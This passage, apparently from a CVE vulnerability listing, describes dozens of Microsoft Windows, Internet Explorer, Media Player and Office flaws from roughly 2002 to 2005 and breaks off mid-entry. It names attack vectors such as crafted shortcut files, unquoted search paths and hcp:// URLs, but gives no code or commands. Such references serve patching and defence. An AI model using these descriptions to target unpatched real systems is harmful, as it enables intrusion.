users to gain privileges via a malicious "program.exe" file in the C: folder, involving the programs (1) GIANTAntiSpywareMain.exe, (2) gcASNotice.exe, (3) gcasServ.exe, (4) gcasSWUpdater.exe, or (5) GIANTAntiSpywareUpdater.exe. NOTE: it is not clear whether this overlaps CVE-2005-2935. [CVE-2005-2935] Unquoted Windows search path vulnerability in Microsoft AntiSpyware might allow local users to execute code via a malicious c:\program.exe file, which is run by AntiSpywareMain.exe when it attempts to execute gsasDtServ.exe. NOTE: it is not clear whether this overlaps CVE-2005-2940. [CVE-2005-2388] Buffer overflow in a certain USB driver, as used on Microsoft Windows, allows attackers to execute arbitrary code. [CVE-2005-2307] netman.dll in Microsoft Windows Connections Manager Library allows local users to cause a denial of service (Network Connections Service crash) via a large integer argument to a particular function, aka "Network Connection Manager Vulnerability." [CVE-2005-2224] aspnet_wp.exe in Microsoft ASP.NET web services allows remote attackers to cause a denial of service (CPU consumption from infinite loop) via a crafted SOAP message to an RPC/Encoded method. [CVE-2005-2128] QUARTZ.DLL in Microsoft Windows Media Player 9 allows remote attackers to write a null byte to arbitrary memory via an AVI file with a crafted strn element with a modified length value. [CVE-2005-2122] Windows Shell for Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 allows remote attackers to execute arbitrary commands via a shortcut (.lnk) file with long font properties that lead to a buffer overflow in the Client/Server Runtime Server Subsystem (CSRSS), a different vulnerability than CVE-2005-2118. [CVE-2005-2120] Stack-based buffer overflow in the Plug and Play (PnP) service (UMPNPMGR.DLL) in Microsoft Windows 2000 SP4, and XP SP1 and SP2, allows remote or local authenticated attackers to execute arbitrary code via a large number of "\" (backslash) characters in a registry key name, which triggers the overflow in a wsprintfW function call. [CVE-2005-2118] Windows Shell for Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 allows remote user-assisted attackers to execute arbitrary commands via a crafted shortcut (.lnk) file with long font properties that lead to a buffer overflow when the user views the file's properties using Windows Explorer, a different vulnerability than CVE-2005-2122. [CVE-2005-2117] Web View in Windows Explorer on Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 does not properly handle certain HTML characters in preview fields, which allows remote user-assisted attackers to execute arbitrary code. [CVE-2005-1987] Buffer overflow in Collaboration Data Objects (CDO), as used in Microsoft Windows and Microsoft Exchange Server, allows remote attackers to execute arbitrary code when CDOSYS or CDOEX processes an e-mail message with a large header name, as demonstrated using the "Content-Type" string. [CVE-2005-1985] The Client Service for NetWare (CSNW) on Microsoft Windows 2000 SP4, XP SP1 and Sp2, and Server 2003 SP1 and earlier, allows remote attackers to execute arbitrary code due to an "unchecked buffer" when processing certain crafted network messages. [CVE-2005-1984] Buffer overflow in the Print Spooler service (Spoolsv.exe) for Microsoft Windows 2000, Windows XP, and Windows Server 2003 allows remote attackers to execute arbitrary code via a malicious message. [CVE-2005-1983] Stack-based buffer overflow in the Plug and Play (PnP) service for Microsoft Windows 2000 and Windows XP Service Pack 1 allows remote attackers to execute arbitrary code via a crafted packet, and local users to gain privileges via a malicious application, as exploited by the Zotob (aka Mytob) worm. [CVE-2005-1982] Unknown vulnerability in the PKINIT Protocol for Microsoft Windows 2000, Windows XP, and Windows Server 2003 could allow a local user to obtain information and spoof a server via a man-in-the-middle (MITM) attack between a client and a domain controller when PKINIT smart card authentication is being used. [CVE-2005-1981] Unknown vulnerability in Microsoft Windows 2000 Server and Windows Server 2003 domain controllers allows remote authenticated users to cause a denial of service (system crash) via a crafted Kerberos message. [CVE-2005-1980] Distributed Transaction Controller in Microsoft Windows allows remote servers to cause a denial of service (MSDTC service hang) via a crafted Transaction Internet Protocol (TIP) message that causes DTC to repeatedly connect to a target IP and port number after an error occurs, aka the "Distributed TIP Vulnerability." [CVE-2005-1979] Distributed Transaction Controller in Microsoft Windows allows remote servers to cause a denial of service (MSDTC service exception and exit) via an "unexpected protocol command during the reconnection request," which is not properly handled by the Transaction Internet Protocol (TIP) functionality. [CVE-2005-1978] COM+ in Microsoft Windows does not properly "create and use memory structures," which allows local users or remote attackers to execute arbitrary code. [CVE-2005-1793] User32.DLL in Microsoft Windows 98SE, and possibly other operating systems, allows local and remote attackers to cause a denial of service (crash) via an icon (.ico) bitmap file with large width and height values. [CVE-2005-1792] Memory leak in Windows Management Instrumentation (WMI) service allows attackers to cause a denial of service (memory consumption and crash) by creating security contexts more quickly than they can be cleared from the RPC cache. [CVE-2005-1219] Buffer overflow in the Microsoft Color Management Module for Windows allows remote attackers to execute arbitrary code via an image with crafted ICC profile format tags. [CVE-2005-1218] The Microsoft Windows kernel in Microsoft Windows 2000 Server, Windows XP, and Windows Server 2003 allows remote attackers to cause a denial of service (crash) via crafted Remote Desktop Protocol (RDP) requests. [CVE-2005-1208] Integer overflow in Microsoft Windows 98, 2000, XP SP2 and earlier, and Server 2003 SP1 and earlier allows remote attackers to execute arbitrary code via a crafted compiled Help (.CHM) file with a large size field that triggers a heap-based buffer overflow, as demonstrated using a "ms-its:" URL in Internet Explorer. [CVE-2005-1207] Buffer overflow in the Web Client service in Microsoft Windows XP and Windows Server 2003 allows remote authenticated users to execute arbitrary code via a crafted WebDAV request containing special parameters. [CVE-2005-1206] Buffer overflow in the Server Message Block (SMB) functionality for Microsoft Windows 2000, XP SP1 and SP2, and Server 2003 and SP1 allows remote attackers to execute arbitrary code via unknown vectors, aka the "Server Message Block Vulnerability." [CVE-2005-1205] The Telnet client for Microsoft Windows XP, Windows Server 2003, and Windows Services for UNIX allows remote attackers to read sensitive environment variables via the NEW-ENVIRON option with a SEND ENV_USERVAR command. [CVE-2005-0852] Microsoft Windows XP SP1 allows local users to cause a denial of service (system crash) via an empty datagram to a raw IP over IP socket (IP protocol 4), as originally demonstrated using code in Python 2.3. [CVE-2005-0771] VERITAS Backup Exec Server (beserver.exe) 9.0 through 10.0 for Windows allows remote unauthenticated attackers to modify the registry by calling methods to the RPC interface on TCP port 6106. [CVE-2005-0551] Stack-based buffer overflow in WINSRV.DLL in the Client Server Runtime System (CSRSS) process of Microsoft Windows 2000, Windows XP SP1 and SP2, and Windows Server 2003 allows local users to gain privileges via a specially-designed application that provides console window information with a long FaceName value. [CVE-2005-0550] Buffer overflow in Microsoft Windows 2000, Windows XP SP1 and SP2, and Windows Server 2003 allows local users to cause a denial of service (i.e., system crash) via a malformed request, aka "Object Management Vulnerability". [CVE-2005-0545] Microsoft Windows XP Pro SP2 and Windows 2000 Server SP4 running Active Directory allow local users to bypass group policies that restrict access to hidden drives by using the browse feature in Office 10 applications such as Word or Excel, or using a flash drive. NOTE: this issue has been disputed in a followup post. [CVE-2005-0063] The document processing application used by the Windows Shell in Microsoft Windows 2000, Windows XP, and Windows Server 2003 allows remote attackers to execute arbitrary code by modifying the CLSID stored in a file so that it is processed by HTML Application Host (MSHTA), as demonstrated using a Microsoft Word document. [CVE-2005-0061] The kernel of Microsoft Windows 2000, Windows XP SP1 and SP2, and Windows Server 2003 allows local users to gain privileges via certain access requests. [CVE-2005-0060] Buffer overflow in the font processing component of Microsoft Windows 2000, Windows XP SP1 and SP2, and Windows Server 2003 allows local users to gain privileges via a specially-designed application. [CVE-2005-0059] Buffer overflow in the Message Queuing component of Microsoft Windows 2000 and Windows XP SP1 allows remote attackers to execute arbitrary code via a crafted message. [CVE-2005-0058] Buffer overflow in the Telephony Application Programming Interface (TAPI) for Microsoft Windows 98, Windows 98 SE, Windows ME, Windows 2000, Windows XP, and Windows Server 2003 allows attackers elevate privileges or execute arbitrary code via a crafted message. [CVE-2005-0048] Microsoft Windows XP SP2 and earlier, 2000 SP3 and SP4, Server 2003, and older operating systems allows remote attackers to cause a denial of service and possibly execute arbitrary code via crafted IP packets with malformed options, aka the "IP Validation Vulnerability." [CVE-2004-2527] The local and remote desktop login screens in Microsoft Windows XP before SP2 and 2003 allow remote attackers to cause a denial of service (CPU and memory consumption) by repeatedly using the WinKey+"U" key combination, which causes multiple copies of Windows Utility Manager to be loaded more quickly than they can be closed when the copies detect that another instance is running. [CVE-2004-2454] aMSN 0.90 for Microsoft Windows allows local users to obtain sensitive information such as hashed passwords from (1) hotlog.htm and (2) config.xml. [CVE-2004-2365] Memory leak in Microsoft Windows XP and Windows Server 2003 allows local users to cause a denial of service (memory exhaustion) by repeatedly creating and deleting directories using a non-standard tool such as smbmount. [CVE-2004-2339] DISPUTED ** Microsoft Windows 2000, XP, and possibly 2003 allows local users with the SeDebugPrivilege privilege to execute arbitrary code as kernel and read or write kernel memory via the NtSystemDebugControl function, which does not verify its pointer arguments. Note: this issue has been disputed, since Administrator privileges are typically required to exploit this issue, thus privilege boundaries are not crossed. [CVE-2004-2307] Microsoft Internet Explorer 6.0.2600 on Windows XP allows remote attackers to cause a denial of service (browser crash) via a shell: URI with double backslashes (\\) in an HTML tag such as IFRAME or A. [CVE-2004-2291] Microsoft Windows Internet Explorer 5.5 and 6.0 allows remote attackers to execute arbitrary code via an embedded script that uses Shell Helper objects and a shortcut (link) to execute the target script. [CVE-2004-2290] Microsoft Windows XP Explorer allows attackers to execute arbitrary code via a HTML and script in a self-executing folder that references an executable file within the folder, which is automatically executed when a user accesses the folder. [CVE-2004-2289] Microsoft Windows XP Explorer allows local users to execute arbitrary code via a system folder with a Desktop.ini file containing a .ShellClassInfo specifier with a CLSID value that is associated with an executable file. [CVE-2004-2176] The Internet Connection Firewall (ICF) in Microsoft Windows XP SP2 is configured by default to trust sessmgr.exe, which allows local users to use sessmgr.exe to create a local listening port that bypasses the ICF access controls. [CVE-2004-1889] Unknown vulnerability in ftpd in SGI IRIX 6.5.20 through 6.5.23 allows remote attackers to cause a denial of service (hang) via a link failure with Microsoft Windows. [CVE-2004-1325] The getItemInfoByAtom function in the ActiveX control for Microsoft Windows Media Player 9.0 returns a 0 if the file does not exist and the size of the file if the file exists, which allows remote attackers to determine the existence of files on the local system. [CVE-2004-1324] The Microsoft Windows Media Player 9.0 ActiveX control may allow remote attackers to execute arbitrary web script in the Local computer zone via the (1) artist or (2) song fields of a music file, if the file is processed using Internet Explorer. [CVE-2004-1080] The WINS service (wins.exe) on Microsoft Windows NT Server 4.0, Windows 2000 Server, and Windows Server 2003 allows remote attackers to write to arbitrary memory locations and possibly execute arbitrary code via a modified memory pointer in a WINS replication packet to TCP port 42, aka the "Association Context Vulnerability." [CVE-2004-1049] Integer overflow in the LoadImage API of the USER32 Lib for Microsoft Windows allows remote attackers to execute arbitrary code via a .bmp, .cur, .ico or .ani file with a large image size field, which leads to a buffer overflow, aka the "Cursor and Icon Format Handling Vulnerability." [CVE-2004-0901] Microsoft Word for Windows 6.0 Converter (MSWRD632.WPC), as used in WordPad, does not properly validate certain data lengths, which allows remote attackers to execute arbitrary code via a .wri, .rtf, and .doc file sent by email or malicious web site, aka "Font Conversion Vulnerability," a different vulnerability than CVE-2004-0571. [CVE-2004-0900] The DHCP Server service for Microsoft Windows NT 4.0 Server and Terminal Server Edition does not properly validate the length of certain messages, which allows remote attackers to execute arbitrary code via a malformed DHCP message, aka the "DHCP Request Vulnerability." [CVE-2004-0899] The DHCP Server service for Microsoft Windows NT 4.0 Server and Terminal Server Edition, with DHCP logging enabled, does not properly validate the length of certain messages, which allows remote attackers to cause a denial of service (application crash) via a malformed DHCP message, aka "Logging Vulnerability." [CVE-2004-0897] The Indexing Service for Microsoft Windows XP and Server 2003 does not properly validate the length of a message, which allows remote attackers to execute arbitrary code via a buffer overflow attack. [CVE-2004-0840] The SMTP (Simple Mail Transfer Protocol) component of Microsoft Windows XP 64-bit Edition, Windows Server 2003, Windows Server 2003 64-bit Edition, and the Exchange Routing Engine component of Exchange Server 2003, allows remote attackers to execute arbitrary code via a malicious DNS response message containing length values that are not properly validated. [CVE-2004-0727] Microsoft Internet Explorer 6.0.2800.1106 on Microsoft Windows XP SP2, and other versions including 5.01 and 5.5, allows remote web servers to bypass zone restrictions and execute arbitrary code in the local computer zone by redirecting a function to another function with the same name, as demonstrated by SimilarMethodNameRedir, aka the "Similar Method Name Redirection Cross Domain Vulnerability." [CVE-2004-0726] The Windows Media Player control in Microsoft Windows 2000 allows remote attackers to execute arbitrary script in the local computer zone via an ASX filename that contains javascript, which is executed in the local context in a preview panel. [CVE-2004-0575] Integer overflow in DUNZIP32.DLL for Microsoft Windows XP, Windows XP 64-bit Edition, Windows Server 2003, and Windows Server 2003 64-bit Edition allows remote attackers to execute arbitrary code via compressed (zipped) folders that involve an "unchecked buffer" and improper length validation. [CVE-2004-0574] The Network News Transfer Protocol (NNTP) component of Microsoft Windows NT Server 4.0, Windows 2000 Server, Windows Server 2003, Exchange 2000 Server, and Exchange Server 2003 allows remote attackers to execute arbitrary code via XPAT patterns, possibly related to improper length validation and an "unchecked buffer," leading to off-by-one and heap-based buffer overflows. [CVE-2004-0572] Buffer overflow in the Windows Program Group Converter (grpconv.exe) may allow remote attackers to execute arbitrary code via a shell: URL with a long filename and a .grp extension, which is not properly handled when the shell capability launches grpconv.exe. [CVE-2004-0571] Microsoft Word for Windows 6.0 Converter does not properly validate certain data lengths, which allows remote attackers to execute arbitrary code via a .wri, .rtf, and .doc file sent by email or malicious web site, aka "Table Conversion Vulnerability," a different vulnerability than CVE-2004-0901. [CVE-2004-0540] Microsoft Windows 2000, when running in a domain whose Fully Qualified Domain Name (FQDN) is exactly 8 characters long, does not prevent users with expired passwords from logging on to the domain. [CVE-2004-0503] Microsoft Outlook 2003 allows remote attackers to bypass the default zone restrictions and execute script within media files via a Rich Text Format (RTF) message containing an OLE object for the Windows Media Player, which bypasses Media Player's setting to disallow scripting and may lead to unprompted installation of an executable when exploited in conjunction with predictable-file-location exposures such as CVE-2004-0502. [CVE-2004-0214] Buffer overflow in Microsoft Internet Explorer and Explorer on Windows XP SP1, WIndows 2000, Windows 98, and Windows Me may allow remote malicious servers to cause a denial of service (application crash) and possibly execute arbitrary code via long share names, as demonstrated using Samba. [CVE-2004-0211] The kernel for Microsoft Windows Server 2003 does not reset certain values in CPU data structures, which allows local users to cause a denial of service (system crash) via a malicious program. [CVE-2004-0210] The POSIX component of Microsoft Windows NT and Windows 2000 allows local users to execute arbitrary code via certain parameters, possibly by modifying message length values and causing a buffer overflow. [CVE-2004-0209] Unknown vulnerability in the Graphics Rendering Engine processes of Microsoft Windows 2000, Windows XP, and Windows Server 2003 allows remote attackers to execute arbitrary code via (1) Windows Metafile (WMF) or (2) Enhanced Metafile (EMF) image formats that involve "an unchecked buffer." [CVE-2004-0208] The Virtual DOS Machine (VDM) subsystem of Microsoft Windows NT 4.0, Windows 2000, Windows XP, and Windows Server 2003 allows local users to access kernel memory and gain privileges via a malicious program that modified some system structures in a way that is not properly validated by privileged operating system functions. [CVE-2004-0207] "Shatter" style vulnerability in the Window Management application programming interface (API) for Microsoft Windows 98, Windows NT 4.0, Windows 2000, Windows XP, and Windows Server 2003 allows local users to gain privileges by using certain API functions to change properties of privileged programs using the SetWindowLong and SetWIndowLongPtr API functions. [CVE-2004-0206] Network Dynamic Data Exchange (NetDDE) services for Microsoft Windows 98, Windows NT 4.0, Windows 2000, Windows XP, and Windows Server 2003 allows attackers to remotely execute arbitrary code or locally gain privileges via a malicious message or application that involves an "unchecked buffer," possibly a buffer overflow. [CVE-2004-0202] IDirectPlay4 Application Programming Interface (API) of Microsoft DirectPlay 7.0a thru 9.0b, as used in Windows Server 2003 and earlier allows remote attackers to cause a denial of service (application crash) via a malformed packet. [CVE-2004-0201] Heap-based buffer overflow in the HtmlHelp program (hh.exe) in HTML Help for Microsoft Windows 98, Me, NT 4.0, 2000, XP, and Server 2003 allows remote attackers to execute arbitrary commands via a .CHM file with a large length field, a different vulnerability than CVE-2003-1041. [CVE-2004-0199] Help and Support Center in Microsoft Windows XP and Windows Server 2003 SP1 does not properly validate HCP URLs, which allows remote attackers to execute arbitrary code, as demonstrated using certain hcp:// URLs that access the DVD Upgrade capability (dvdupgrd.htm). [CVE-2004-0120] The Microsoft Secure Sockets Layer (SSL) library, as used in Windows 2000, Windows XP, and Windows Server 2003, allows remote attackers to cause a denial of service via malformed SSL messages. [CVE-2003-1107] The DHTML capability in Microsoft Windows Media Player (WMP) 6.4, 7.0, 7.1, and 9 may run certain URL commands from a security zone that is less trusted than the current zone, which allows attackers to bypass intended access restrictions. [CVE-2003-1106] The SMTP service in Microsoft Windows 2000 before SP4 allows remote attackers to cause a denial of service (crash or hang) via an e-mail message with a malformed time stamp in the FILETIME attribute. [CVE-2003-0995] Buffer overflow in the Microsoft Message Queue Manager (MSQM) allows remote attackers to cause a denial of service (RPC service crash) via a queue registration request. [CVE-2003-0908] The Utility Manager in Microsoft Windows 2000 executes winhlp32.exe with system privileges, which allows local users to execute arbitrary code via a "Shatter" style attack using a Windows message that accesses the context sensitive help button in the GUI, as demonstrated using the File Open dialog in the Help window, a different vulnerability than CVE-2004-0213. [CVE-2003-0907] Help and Support Center in Microsoft Windows XP SP1 does not properly validate HCP URLs, which allows remote attackers to execute arbitrary code via quotation marks in an hcp:// URL, which are not quoted when constructing the argument list to HelpCtr.exe. [CVE-2003-0906] Buffer overflow in the rendering for (1) Windows Metafile (WMF) or (2) Enhanced Metafile (EMF) image formats in Microsoft Windows NT 4.0 SP6a, 2000 SP2 through SP4, and XP SP1 allows remote attackers to execute arbitrary code via a malformed WMF or EMF image. [CVE-2003-0839] Directory traversal vulnerability in the "Shell Folders" capability in Microsoft Windows Server 2003 allows remote attackers to read arbitrary files via .. (dot dot) sequences in a "shell:" link. [CVE-2003-0825] The Windows Internet Naming Service (WINS) for Microsoft Windows Server 2003, and possibly Windows NT and Server 2000, does not properly validate the length of certain packets, which allows attackers to cause a denial of service and possibly execute arbitrary code. [CVE-2003-0818] Multiple integer overflows in Microsoft ASN.1 library (MSASN1.DLL), as used in LSASS.EXE, CRYPT32.DLL, and other Microsoft executables and libraries on Windows NT 4.0, 2000, and XP, allow remote attackers to execute arbitrary code via ASN.1 BER encodings with (1) very large length fields that cause arbitrary heap data to be overwritten, or (2) modified bit strings. [CVE-2003-0813] A multi-threaded race condition in the Windows RPC DCOM functionality with the MS03-039 patch installed allows remote attackers to cause a denial of service (crash or reboot) by causing two threads to process the same RPC request, which causes one thread to use memory after it has been freed, a different vulnerability than CVE-2003-0352 (Blaster/Nachi), CVE-2003-0715, and CVE-2003-0528, and as demonstrated by certain exploits against those vulnerabilities. [CVE-2003-0812] Stack-based buffer overflow in a logging function for Windows Workstation Service (WKSSVC.DLL) allows remote attackers to execute arbitrary code via RPC calls that cause long entries to be written to a debug log file ("NetSetup.LOG"), as demonstrated using the NetAddAlternateComputerName API. [CVE-2003-0806] Buffer overflow in the Windows logon process (winlogon) in Microsoft Windows NT 4.0 SP6a, 2000 SP2 through SP4, and XP SP1, when a member of a domain, allows remote attackers to execute arbitrary code. [CVE-2003-0719] Buffer overflow in the Private Communications Transport (PCT) protocol implementation in the Microsoft SSL library, as used in Microsoft Windows NT 4.0 SP6a, 2000 SP2 through SP4, XP SP1, Server 2003, NetMeeting, Windows 98, and Windows ME, allows remote attackers to execute arbitrary code via PCT 1.0 handshake packets. [CVE-2003-0662] Buffer overflow in Troubleshooter ActiveX Control (Tshoot.ocx) in Microsoft Windows 2000 SP4 and earlier allows remote attackers to execute arbitrary code via an HTML document with a long argument to the RunQuery2 method. [CVE-2003-0660] The Authenticode capability in Microsoft Windows NT through Server 2003 does not prompt the user to download and install ActiveX controls when the system is low on memory, which could allow remote attackers execute arbitrary code without user approval. [CVE-2003-0605] The RPC DCOM interface in Windows 2000 SP3 and SP4 allows remote attackers to cause a denial of service (crash), and local attackers to use the DoS to hijack the epmapper pipe to gain privileges, via certain messages to the __RemoteGetClassObject interface that cause a NULL pointer to be passed to the PerformScmStage function. [CVE-2003-0604] Windows Media Player (WMP) 7 and 8, as running on Internet Explorer and possibly other Microsoft products that process HTML, allows remote attackers to bypass zone restrictions and access or execute arbitrary files via an IFRAME tag pointing to an ASF file whose Content-location contains a File:// URL. [CVE-2003-0533] Stack-based buffer overflow in certain Active Directory service functions in LSASRV.DLL of the Local Security Authority Subsystem Service (LSASS) in Microsoft Windows NT 4.0 SP6a, 2000 SP2 through SP4, XP SP1, Server 2003, NetMeeting, Windows 98, and Windows ME, allows remote attackers to execute arbitrary code via a packet that causes the DsRolerUpgradeDownlevelServer function to create long debug entries for the DCPROMO.LOG log file, as exploited by the Sasser worm. [CVE-2003-0496] Microsoft SQL Server before Windows 2000 SP4 allows local users to gain privileges as the SQL Server user by calling the xp_fileexist extended stored procedure with a named pipe as an argument instead of a normal file. [CVE-2003-0349] Buffer overflow in the streaming media component for logging multicast requests in the ISAPI for the logging capability of Microsoft Windows Media Services (nsiislog.dll), as installed in IIS 5.0, allows remote attackers to execute arbitrary code via a large POST request to nsiislog.dll. [CVE-2003-0348] A certain Microsoft Windows Media Player 9 Series ActiveX control allows remote attackers to view and manipulate the Media Library on the local system via HTML script. [CVE-2003-0346] Multiple integer overflows in a Microsoft Windows DirectX MIDI library (QUARTZ.DLL) allow remote attackers to execute arbitrary code via a MIDI (.mid) file with (1) large length for a Text or Copyright string, or (2) a large number of tracks, which leads to a heap-based buffer overflow. [CVE-2003-0345] Buffer overflow in the SMB capability for Microsoft Windows XP, 2000, and NT allows remote attackers to cause a denial of service and possibly execute arbitrary code via an SMB packet that specifies a smaller buffer length than is required. [CVE-2003-0228] Directory traversal vulnerability in Microsoft Windows Media Player 7.1 and Windows Media Player for Windows XP allows remote attackers to execute arbitrary code via a skins file with a URL containing hex-encoded backslash characters (%5C) that causes an executable to be placed in an arbitrary location. [CVE-2003-0227] The logging capability for unicast and multicast transmissions in the ISAPI extension for Microsoft Windows Media Services in Microsoft Windows NT 4.0 and 2000, nsiislog.dll, allows remote attackers to cause a denial of service in Internet Information Server (IIS) and execute arbitrary code via a certain network request. [CVE-2003-0111] The ByteCode Verifier component of Microsoft Virtual Machine (VM) build 5.0.3809 and earlier, as used in Windows and Internet Explorer, allows remote attackers to bypass security checks and execute arbitrary code via a malicious Java applet, aka "Flaw in Microsoft VM Could Enable System Compromise." [CVE-2003-0109] Buffer overflow in ntdll.dll on Microsoft Windows NT 4.0, Windows NT 4.0 Terminal Server Edition, Windows 2000, and Windows XP allows remote attackers to execute arbitrary code, as demonstrated via a WebDAV request to IIS 5.0. [CVE-2003-0009] Cross-site scripting (XSS) vulnerability in Help and Support Center for Microsoft Windows Me allows remote attackers to execute arbitrary script in the Local Computer security context via an hcp:// URL with the malicious script in the topic parameter. [CVE-2003-0004] Buffer overflow in the Windows Redirector function in Microsoft Windows XP allows local users to execute arbitrary code via a long parameter. [CVE-2002-2283] Microsoft Windows XP with Fast User Switching (FUS) enabled does not remove the "show processes from all users" privilege when the user is removed from the administrator group, which allows that user to view prosesses of other users. [CVE-2002-2117] Microsoft Windows XP allows remote attackers to cause a denial of service (CPU consumption) by flooding UDP port 500 (ISAKMP). [CVE-2002-2105] Microsoft Windows XP allows local users to prevent the system from booting via a corrupt explorer.exe.manifest file. [CVE-2002-2073] Cross-site scripting (XSS) vulnerability in the default ASP pages on Microsoft Site Server 3.0 on Windows NT 4.0 allows remote attackers to inject arbitrary web script or HTML via the (1) ctr parameter in Default.asp and (2) the query string to formslogin.asp. [CVE-2002-1984] Microsoft Internet Explorer 5.0.1 through 6.0 on Windows 2000 or Windows XP allows remote attackers to cause a denial of service (crash) via an OBJECT tag that contains a crafted CLASSID (CLSID) value of "CLSID:00022613-0000-0000-C000-000000000046". [CVE-2002-1933] The terminal services screensaver for Microsoft Windows 2000 does not automatically lock the terminal window if the window is minimized, which could allow local users to gain access to the terminal server window. [CVE-2002-1932] Microsoft Windows XP and Windows 2000, when configured to send administrative alerts and the "Do not overwrite events (clear log manually)" option is set, does not notify the administrator when the log reaches its maximum size, which allows local users and remote attackers to avoid detection. [CVE-2002-1873] Microsoft Exchange 2000, when used with Microsoft Remote Procedure Call (MSRPC), allows remote attackers to cause a denial of service (crash or memory consumption) via malformed MSRPC calls. [CVE-2002-1847] Buffer overflow in mplay32.exe of Microsoft Windows Media Player (WMP) 6.3 through 7.1 allows remote attackers to execute arbitrary commands via a long mp3 filename command line argument. NOTE: since the only known attack vector requires command line access, this may not be a vulnerability. [CVE-2002-1844] Microsoft Windows Media Player (WMP) 6.3, when installed on Solaris, installs executables with world-writable permissions, which allows local users to delete or modify the executables to gain privileges. [CVE-2002-1712] Microsoft Windows 2000 allows remote attackers to cause a denial of service (memory consumption) by sending a flood of empty TCP/IP packets with the ACK and FIN bits set to the NetBIOS port (TCP/139), as demonstrated by stream3. [CVE-2002-1692] Buffer overflow in backup utility of Microsoft Windows 95 allows attackers to execute arbitrary code by causing a filename with a long extension to be placed in a folder to be backed up. [CVE-2002-1670] Microsoft Windows XP Professional upgrade edition overwrites previously installed patches for Internet Explorer 6.0, leaving Internet Explorer unpatched. [CVE-2002-1561] The RPC component in Windows 2000, Windows NT 4.0, and Windows XP allows remote attackers to cause a denial of service (disabled RPC service) via a malformed packet to the RPC Endpoint Mapper at TCP port 135, which triggers a null pointer dereference. [CVE-2002-1327] Buffer overflow in the Windows Shell function in Microsoft Windows XP allows remote attackers to execute arbitrary code via an .MP3 or .WMA audio file with a corrupt custom attribute, aka "Unchecked Buffer in Windows Shell Could Enable System Compromise." [CVE-2002-1256] The SMB signing capability in the Server Message Block (SMB) protocol in Microsoft Windows 2000 and Windows XP allows attackers to disable the digital signing settings in an SMB session to force the data to be sent unsigned, then inject data into the session without detection, e.g. by modifying group policy information sent from a domain controller. [CVE-2002-1214] Buffer overflow in Microsoft PPTP Service on Windows XP and Windows 2000 allows remote attackers to cause a denial of service (hang) and possibly execute arbitrary code via a certain PPTP packet with malformed control data. [CVE-2002-1184] The system root folder of Microsoft Windows 2000 has default permissions of Everyone group with Full access (Everyone:F) and is in the search path when locating programs during login or application launch from the desktop, which could allow attackers to gain privileges as other users via Trojan horse programs. [CVE-2002-1183] Microsoft Windows 98 and Windows NT 4.0 do not properly verify the Basic Constraints of digital certificates, allowing remote attackers to execute code, aka "New Variant of Certificate Validation Flaw Could Enable Identity Spoofing" (CAN-2002-0862). [CVE-2002-1139] The Compressed Folders feature in Microsoft Windows 98 with Plus! Pack, Windows Me, and Windows XP does not properly check the destination folder during the decompression of ZIP files, which allows attackers to place an executable file in a known location on a user's system, aka "Incorrect Target Path for Zipped File Decompression." [CVE-2002-0864] The Remote Data Protocol (RDP) version 5.1 in Microsoft Windows XP allows remote attackers to cause a denial of service (crash) when Remote Desktop is enabled via a PDU Confirm Active data packet that does not set the Pattern BLT command, aka "Denial of Service in Remote Desktop." [CVE-2002-0863] Remote Data Protocol (RDP) version 5.0 in Microsoft Windows 2000 and RDP 5.1 in Windows XP does not encrypt the checksums of plaintext session data, which could allow a remote attacker to determine the contents of encrypted sessions via sniffing, aka "Weak Encryption in RDP Protocol." [CVE-2002-0862] The (1) CertGetCertificateChain, (2) CertVerifyCertificateChainPolicy, and (3) WinVerifyTrust APIs within the CryptoAPI for Microsoft products including Microsoft Windows 98 through XP, Office for Mac, Internet Explorer for Mac, and Outlook Express for Mac, do not properly verify the Basic Constraints of intermediate CA-signed X.509 certificates, which allows remote attackers to spoof the certificates of trusted sites via a man-in-the-middle attack for SSL sessions, as originally reported for Internet Explorer and IIS. [CVE-2002-0724] Buffer overflow in SMB (Server Message Block) protocol in Microsoft Windows NT, Windows 2000, and Windows XP allows attackers to cause a denial of service (crash) via a SMB_COM_TRANSACTION packet with a request for the (1) NetShareEnum, (2) NetServerEnum2, or (3) NetServerEnum3, aka "Unchecked Buffer in Network Share Provider Can Lead to Denial of Service". [CVE-2002-0699] Unknown vulnerability in the Certificate Enrollment ActiveX Control in Microsoft Windows 98, Windows 98 Second Edition, Windows Millennium, Windows NT 4.0, Windows 2000, and Windows XP allow remote attackers to delete digital certificates on a user's system via HTML. [CVE-2002-0694] The HTML Help facility in Microsoft Windows 98, 98 Second Edition, Millennium Edition, NT 4.0, NT 4.0 Terminal Server Edition, Windows 2000, and Windows XP uses the Local Computer Security Zone when opening .chm files from the Temporary Internet Files folder, which allows remote attackers to execute arbitrary code via HTML mail that references or inserts a malicious .chm file containing shortcuts that can be executed, aka "Code Execution via Compiled HTML Help File." [CVE-2002-0693] Buffer overflow in the HTML Help ActiveX Control (hhctrl.ocx) in Microsoft Windows 98, 98 Second Edition, Millennium Edition, NT 4.0, NT 4.0 Terminal Server Edition, Windows 2000, and Windows XP allows remote attackers to execute code via (1) a long parameter to the Alink function, or (2) script containing a long argument to the showHelp function. [CVE-2002-0619] The Mail Merge Tool in Microsoft Word 2002 for Windows, when Microsoft Access is present on a system, allows remote attackers to execute Visual Basic (VBA) scripts within a mail merge document that is saved in HTML format, aka a "Variant of MS00-071, Word Mail Merge Vulnerability" (CVE-2000-0788). [CVE-2002-0618] The Macro Security Model in Microsoft Excel 2000 and 2002 for Windows allows remote attackers to execute code in the Local Computer zone by embedding HTML scripts within an Excel workbook that contains an XSL stylesheet, aka "Excel XSL Stylesheet Script Execution". [CVE-2002-0617] The Macro Security Model in Microsoft Excel 2000 and 2002 for Windows allows remote attackers to execute code by creating a hyperlink on a drawing shape in a source workbook that points to a destination workbook containing an autoexecute macro, aka "Hyperlinked Excel Workbook Macro Bypass." [CVE-2002-0616] The Macro Security Model in Microsoft Excel 2000 and 2002 for Windows allows remote attackers to execute code by attaching an inline macro to an object within an Excel workbook, aka the "Excel Inline Macros Vulnerability." [CVE-2002-0615] The Windows Media Active Playlist in Microsoft Windows Media Player 7.1 stores information in a well known location on the local file system, allowing attackers to execute HTML scripts in the Local Computer zone, aka "Media Playback Script Invocation". [CVE-2002-0597] LANMAN service on Microsoft Windows 2000 allows remote attackers to cause a denial of service (CPU/memory exhaustion) via a stream of malformed data to microsoft-ds port 445. [CVE-2002-0444] Microsoft Windows 2000 running the Terminal Server 90-day trial version, and possibly 